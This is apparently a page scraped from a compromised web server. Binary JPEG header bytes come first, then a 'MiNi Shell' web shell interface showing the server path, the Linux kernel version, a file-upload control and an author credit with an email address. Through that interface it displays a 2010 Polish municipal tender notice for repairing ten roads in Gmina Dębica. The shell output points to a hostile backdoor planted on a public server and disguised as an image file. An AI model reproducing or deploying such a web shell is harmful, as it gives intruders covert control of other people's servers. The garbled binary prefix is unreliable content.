JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100802/206519-N-2010.html

<p class="kh_header"><b>Dębica: Remont 10 odcinków dróg gminnych.</b><br>
<b>Numer ogłoszenia: 206519 - 2010; data zamieszczenia: 02.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 14 6803342, 6803310, faks 14 6803336.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont 10 odcinków dróg gminnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont 10 odcinków dróg gminnych.
Remont dróg gminnych polega na wykonaniu górnej warstwy podbudowy tłuczniowej oraz wykonaniu warstwy ścieralnej z betonu asfaltowego. Docelowe obciążenie ruchem przewidziano jako KR 1. W zakresie remontu jest również uzupełnienie poboczy gruntem (w dolnej warstwie) i kruszywem oraz oczyszczenie (odmulenie) rowów przydrożnych. Szczegółowy zakres dla poszczególnych odcinków obejmuje:

1)  Remont drogi gminnej Kędzierz - pastwiska na dł. 400 m 
- profilowanie i zagęszczanie podłoża	                                                                                      1088  m2 
- warstwa górna podbudowy z kruszyw łamanych gr. 7 cm                                                         1040  m2
- oczyszczenie mechaniczne nawierzchni nieulepszonych				         1000  m2 
- nawierzchnia z mieszanek mineralno - bitumicznych asf. gr 5 cm - warstwa ścieralna           1000  m2
- ręczne formowanie nasypów                                                                                                     26.40  m3

2)  Remont drogi gminnej Nagawczyna p. Klabacha na dł. 60 m 
- rozebranie podbudowy z mas min - bitumicznych gr 10 cm				         240  m2
- rozebranie podb z kruszywa gr 10 cm (urobek wbudować w pobocza)	                                  240  m2 
- warstwa górna podbudowy z kruszyw łamanych gr. 10 cm                                                      240  m2
- oczyszczenie mechaniczne nawierzchni nieulepszonych				        240  m2 
- nawierzchnia z mieszanek mineralno - bitumicznych asf. gr 5 cm - warstwa ścieralna          240  m2
- ręczne formowanie nasypów                                                                                                       6,0  m3

3)  Remont drogi gminnej Nagawczyna p. Polański na dł. 200 m 
- profilowanie i zagęszczanie podłoża	                                                                                      1040  m2
- warstwa górna podbudowy z kruszyw łamanych gr. 12 cm                                                         820  m2
- nawierzchnia z mieszanek mineralno - bitumicznych asf. gr 2 cm  - warstwa wiążąca              820  m2
- nawierzchnia z mieszanek mineralno - bitumicznych asf. gr 4 cm - warstwa ścieralna             800  m2
- ręczne formowanie nasypów                                                                                                       30,0  m3

4)  Remont drogi gminnej Nagawczyna p. Tokarz na dł. 200 m 
- profilowanie i zagęszczanie podłoża	                                                                                      644  m2 
- warstwa górna podbudowy z kruszyw łamanych gr. 7 cm                                                         644  m2
- oczyszczenie mechaniczne nawierzchni nieulepszonych				         644  m2 
- nawierzchnia z mieszanek mineralno - bitumicznych asf. gr 5 cm - warstwa ścieralna           600  m2
- ręczne formowanie nasypów                                                                                                        22 m3

5)  Remont drogi gminnej Nagawczyna p. Szewczuk na dł. 130 m 
- wykonanie koryta gł 30 cm								            90  m3
- profilowanie i zagęszczanie podłoża	                                                                                     557,6  m2 
- warstwy dolna podb gr 20 cm (pospółka)                                                                                  265   m2
- warstwa górna podbudowy z kruszyw łamanych gr. 10 cm                                                      265  m2
- warstwa górna podbudowy z kruszyw łamanych gr. 7 cm                                                        257,6  m2
- ustawienie krawężnika 15/30 wraz z wykonaniem ławy betonowej			             93  m
- oczyszczenie mechaniczne nawierzchni nieulepszonych				        522,6  m2 
- nawierzchnia z mieszanek mineralno - bitumicznych asf. gr 5 cm - warstwa ścieralna           490  m2
- ręczne formowanie nasypów                                                                                                       8,8  m3
- warstwa górna podbudowy z kruszyw naturalnych gr. 10 cm - zjazdy                                       40  m2

6)  Remont drogi gminnej Latoszyn za stacją paliw na dł. 270 m 
- profilowanie i zagęszczanie podłoża	                                                                                      945  m2 
- warstwa dolna podbudowy z kruszyw łamanych gr. 10 cm                                                       702  m2
- skropienie asfaltem nawierzchni drogowych		                                                             675  m2
- nawierzchnia z mieszanek mineralno - bitumicznych asf. gr 6 cm - warstwa ścieralna           675  m2
- ręczne formowanie nasypów                                                                                                       16,2  m3
- warstwa górna podbudowy z kruszyw łamanych gr. 6 cm - pobocza                                         270  m2

7)  Remont drogi gminnej Paszczyna p. Żurek na dł. 200 m 
- profilowanie i zagęszczanie podłoża	                                                                                  1352,4   m2
- oczyszczenie rowów z namułu gr 20 cm						        420    m
- warstwa górna podbudowy z kruszyw łamanych gr. 10 cm                                                   1352,4  m2
- ręczne formowanie nasypów                                                                                                      46,2  m3

8)  Remont drogi gminnej Brzeźnica p. Halwa na dł. 230 m
- wykonanie koryta gł 35 cm								        227,5  m3
- profilowanie i zagęszczanie podłoża	                                                                                     1050  m2 
- warstwy dolna podb gr 10 cm (pospółka)                                                                                   650  m2
- warstwa górna podbudowy z kruszyw łamanych gr. 15 cm                                                      1090  m2
- nawierzchnia z mieszanek mineralno - bitumicznych asf. gr 5 cm - warstwa ścieralna          1050  m2
- ręczne formowanie nasypów                                                                                                     14,24  m3
- warstwa górna podbudowy z kruszyw łamanych gr. 20 cm - zjazdy                                            55  m2

9)  Remont drogi gminnej Pustków - Krownice na sołtysa na dł. 290 m 
- wykonanie koryta gł 20 cm								        156,6  m3
- profilowanie i zagęszczanie podłoża	                                                                                     794,6  m2 
- warstwy dolna podbudowy z kruszyw naturalnych (pospółka) gr 10 cm		        783    m2 
- warstwa dolna podbudowy z kruszyw łamanych gr. 10 cm                                                      783    m2
- warstwa górna podbudowy z kruszyw łamanych gr.7 cm                                                        794,6  m2
- oczyszczenie mechaniczne nawierzchni tłuczniowej					        754    m2
- nawierzchnia z mieszanek mineralno - bitumicznych asf. gr 5 cm - warstwa ścieralna          725    m2
- ręczne formowanie nasypów                                                                                                      23,2  m3
- warstwa górna podbudowy z kruszyw łamanych gr. 7 cm - pobocza                                        232  m2

10) Remont drogi gminnej Brzeźnica - Szarwark Górecki na dł. 160 m 
- wykonanie koryta gł 25 cm								        75   m3
- profilowanie i zagęszczanie podłoża	                                                                                    750  m2 
- warstwy dolna podbudowy z kruszyw naturalnych (pospółka) gr 10 cm		       300   m2 
- warstwa dolna podbudowy z kruszyw łamanych gr. 15 cm                                                     750   m2
- nawierzchnia z mieszanek mineralno - bitumicznych asf. gr 5 cm - warstwa ścieralna         750   m2
- ręczne formowanie nasypów                                                                                                     12,8  m3

Przekrój nawierzchni daszkowy, na łukach jednostronny - jak w stanie istniejącym (korekta wielkości spadków).  Wszystkie użyte do remontu materiały winny posiadać świadectwo jakości (atest, certyfikat, świadectwo zgodności z PN itp.) oraz znak bezpieczeństwa. Roboty remontowe mają być wykonane zgodnie z zapisami w Szczegółowych Specyfikacjach Wykonania i Odbioru Robót. Roboty wykonane niezgodnie z  tym dokumentem nie zostaną odebrane. 
CAŁOŚĆ ROBÓT REMONTOWYCH PROWADZONA BĘDZIE W ISTNIEJĄCYM PASIE DROGOWYM. 

Opis  przedmiotu  zamówienia  stanowi : 
       
   -  projekt : rysunki - przekroje dróg gminnych - wykonane przez  : Firmę Projektową PROJEKT  s.c. 
      S.Kawalerczyk , T.kawalerczyk z siedzibą: Nagawczyna 439, 39-200 Dębica ,
   - specyfikacja  techniczna  wykonania  i  odbioru  robót- wykonana przez: Firmę Projektową PROJEKT  s.c. 
     S.Kawalerczyk , T.kawalerczyk ,z siedzibą: Nagawczyna 439, 39-200 Dębica ,
   - przedmiary  robót - wykonane przez : Firmę Projektową PROJEKT  s.c.  S.Kawalerczyk , T.Kawalerczyk
      z siedzibą: Nagawczyna 439, 39-200 Dębica ,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.11.12.00-0, 45.23.31.20-6, 45.23.33.00-2, 45.23.33.20-8, 45.23.31.41-9, 45.23.32.22-1, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania wiedzy i doświadczenia jest spełniony, jeżeli Wykonawca wykaże, że 
w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie) -  wykonał minimum 1  robotę budowlaną tj. :  remont lub rozbudowa lub przebudowa lub budowa dróg  - o wartości  robót  minimum 500 000,00 zł  brutto , oraz załączy dokument potwierdzający, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania osobami zdolnymi do wykonania zamówienia jest spełniony, jeżeli Wykonawca wykaże, że w wykonaniu zamówienia będą uczestniczyć osoby z uprawnieniami do pełnienia   samodzielnych  funkcji technicznych  w budownictwie, w zakresie kierowania robotami budowlanymi  tj.  minimum 2 osoby w  specjalności: 
- drogowej lub mostowej i specjalizacji techniczno- budowlanej do kierowania robotami budowlanymi w zakresie
  drogowych obiektów inżynierskich , 
-  lub konstrukcyjno - budowlanej bez ograniczeń -dotyczy uprawnień budowlanych wydanych na podstawie Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 30 grudnia 1994 r. w sprawie samodzielnych funkcji technicznych w budownictwie - Dz.U. Nr 98 poz 1071 z 2000 r.  ,  

Zamawiający określając wymagania dla osób w zakresie posiadania uprawnień budowlanych dopuszcza odpowiadające im uprawnienia, wydane obywatelom państw Europejskiego Obszaru gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych przepisów ustawy Prawo budowlane (tekst jednolity Dz.U. z 2006 r. 
Nr 156, poz.1118 z późn.zmianami) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63, poz.394)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z art.44 ustawy Prawo zamówień publicznych , wykonawca składa wraz z ofertą oświadczenie
    o spełnieniu warunków udziału w postępowaniu (Załącznik nr 2 do SIWZ), a jeżeli zamawiający żąda
    dokumentów  potwierdzających spełnianie tych warunków, również te dokumenty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Wszelkie zmiany, jakie strony chciałyby wprowadzić do ustaleń wynikających z niniejszej umowy, wymagają formy pisemnej 
        i zgody obu stron pod rygorem nieważności takich zmian.
  2.  Wyłącznie w przypadku wystąpienia okoliczności których Zamawiający nie mógł przewidzieć w dniu zawarcia umowy możliwa jest zmiana umowy dotycząca :
1) terminu realizacji przedmiotu zamówienia w uzgodnieniu z Wykonawcą w następujących przypadkach:
    a)  wstrzymania robót przez  inspektora nadzoru inwestorskiego potwierdzonego wpisem w Dzienniku budowy,
b)  wystąpienia robót dodatkowych, określonych w art.67 ust.1 pkt.5 litera b)ustawy Prawo zamówień publicznych oraz 
      w przypadkach określonych w pkt.2)
           c)  wstrzymania robót przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę, np. dokonanie
 odkrywki archeologicznej, odkrycie niewybuchu, itp.
           d) wystąpienia siły wyższej np. trąby powietrznej, pożaru, powodzi,
           e)  wystąpienia niekorzystnych warunków atmosferycznych, potwierdzonych przez IMiGW, uniemożliwiających 
               dochowanie wymogów technicznych i technologicznych tj. : 
  - temperatury otoczenia poniżej - 10 ° C utrzymującej się przez minimum 3 dni,
  - ciągłych opadów, trwających minimum 3 dni ,przekraczających średnie opady na danym terenie .
f)  wystąpienia osuwisk gruntu nie ustalonych w oparciu o dokonane badania geologiczne lub występujące ponad
     normy, dotyczy również wystąpienia innych, nie dających się przewidzieć zjawisk geologicznych i hydrologicznych
     pojawiających się w trakcie budowy.
2) zakresu i sposobu wykonania przedmiotu zamówienia w uzgodnieniu z Wykonawcą w przypadku :
   a)  zaistnienia istotnych okoliczności powodujących, że wykonanie umowy w zakresie przewidzianym w dokumentacji
        projektowej nie jest możliwe, czego nie można było przewidzieć w chwili zawarcia umowy.
          b)  zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych  poszczególnych elementów 
               obiektu niż przewidzianych w dokumentacji projektowej,
           c) zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie
               publicznym, czego nie można było przewidzieć w chwili zawarcia umowy.
        3)   Innych postanowień umowy w przypadkach:
    	a) zmiany stawek podatku od towarów i usług,
           	b) zmiany nazwy zadania,
              c) zmiany kierownika robót budowlanych.
         4) Warunkiem dokonania zmian  określonych w ust.2 pkt.1) jest wpływ ich przyczyn, na dochowanie terminu wykonania
              robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dębica, 39-200 Dębica,  ul. Stefana Batorego 13 - pokój 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 09:00, miejsce: Urząd Gminy Dębica, 39-200 Dębica,  ul. Stefana Batorego 13 -Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com